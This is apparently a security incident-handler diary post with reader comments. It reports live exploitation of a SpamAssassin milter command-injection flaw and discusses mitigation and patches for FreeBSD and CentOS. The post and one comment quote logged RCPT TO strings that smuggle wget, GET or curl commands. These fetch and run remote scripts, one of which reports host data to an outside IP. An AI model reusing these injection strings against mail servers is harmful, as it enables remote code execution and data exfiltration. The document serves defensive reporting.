Spamassassin Milter Plugin Remote Root Attack

Observant reader Roy caught an interesting exploit attempt against his SMTP server. His review of the logs turned up this:

Messages rejected to recipient: root+:|wget
       hxxp://www.linux-echo.de/.x/p.txt;perl p.txt:   smtp.target.com[10.11.17.18] : User unknown in local recipient
       table; from=<blue@attacker.com> to=<root+:|wget
       hxxp://www.linux-echo.de/.x/p.txt : 1 Time(s)

Handler Bojan notes that it appears that the bad guys have started to actively exploit SpamAssassin's milter vulnerability that has been published last weekend (more details at http://archives.neohapsis.com/archives/fulldisclosure/2010-03/0139.html).

The perl script collects some information about the local host and tries to send it to 203.59.123.114 on port 80 -- this host appears to be unreachable at the moment though.

Cheers,
Adrien de Beaupré
EWA-Canada.com

 

Adrien de Beaupre

353 Posts
ISC Handler
Mar 15th 2010
On FreeBSD, a fix hasn't yet made it into ports. Is there any mitigation against this attack aside from disabling spamass-milter for the time being?
parseword

9 Posts
I'm using spamass-milter on CentOS 5.x (a.k.a. Red Hat Enterprise Linux). Fortunately, the RPM as distributed by Red Hat doesn't use the "-x" flag. *whew* Just check your /etc/sysconfig/spamass-milter EXTRA_FLAGS to see if you added it yourself.

To double-check I attempted the exploit described at the Full Disclosure link (above) and it didn't work.
parseword
3 Posts
I havve logged attempts to use curl as well.

rcpt to: root+:"|wget http://213.186.44.xxx/blue.php"

rcpt to: root+:"|wget http://61.100.185.xxx/busy-1.php"
rcpt to: root+:"|GET http://61.100.185.xxx/busy-2.php"
rcpt to: root+:"|curl http://61.100.185.xxx/busy-3.php"
Travis

5 Posts
@BillBixby: The preliminary patch linked to in the article applies nicely within the port. Just copy it to ${PORTSDIR}/mail/spamass-milter/files/patch-popen and force a rebuild and reinstall of spamass-milter. Tested here on a couple of MTAs (8R-p2 base Sendmail).
Matt

7 Posts

Sign Up for Free or Log In to start participating in the conversation!